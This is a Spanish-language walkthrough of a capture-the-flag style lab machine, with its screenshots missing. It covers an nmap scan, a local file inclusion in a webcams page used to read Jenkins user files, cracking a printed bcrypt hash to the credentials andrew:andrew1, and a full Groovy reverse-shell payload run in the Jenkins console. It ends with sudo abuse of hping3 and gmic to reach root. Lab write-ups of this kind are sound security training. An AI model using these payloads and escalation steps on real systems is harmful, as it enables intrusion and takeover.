Hacemos el escaneo con nmap:

Y esto corre en el puerto 80 y un jenkins en el 8080:

Si hacemos fuzzing al puerto 80 vemos el directorio /webcams:

Y tenemos esta web dentro del directorio webcams:

Dentro de estas webs podemos ver cómo es posible que podamos apuntar contra archivos internos de la máquina víctima:

Por tanto investigamos si en jenkins hay algún archivo donde podamos acceder y ver información sensible:

Y vemos que funciona:

view-source:http://192.168.0.76/webcams/includecam.php?cam=/var/lib/jenkins/users/users

andrew_15328478385288074167

Pero si añadimos config dentro de la url, podremos obtener la contraseña de este usuario:

view-source:http://192.168.0.80/webcams/includecam.php?cam=/var/lib/jenkins/users/andrew_15328478385288074167/config

Por tanto, nos copiamos este hash dentro de un archivo y lo crackeamos con john the ripper:

jbcrypt:$2a$10$V.wxGyfowdGEVLvpQt5DROedmKKUp11g922/V.tb1xmi8eYe7rmzu

Por tanto ya tenemos las siguientes credenciales para entrar dentro del panel de administración de jenkins:

andrew:andrew1

Y estamos dentro:

En este punto vamos a explotar una vulnerabilidad parecida a la máquina MAQUINA INTERNAL (wordpress wpscan, hydra http, portforwarding chisel y hacking jenkins en docker):

Una vez aquí, pegamos el siguiente payload:

String host="10.8.100.91";
int port=444;
String cmd="bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Y con netcat habremos recibido la conexión:

Tenemos el usuario andrew:

Y vemos este permiso de sudo:

Y podemos convertirnos en el usuario andrew de la siguiente forma:

sudo -u andrew /usr/sbin/hping3
/bin/bash

Y volvemos a enumerar permisos de sudo:

Y esto es lo que hace ese binario gmic:

Y dentro del manual de instrucciones de esto, tenemos como ejecutar un comando con gmic:

https://fr.manpages.org/gmic

Por tanto, ejecutamos este comando y ya somos root:

sudo /usr/bin/gmic -exec bash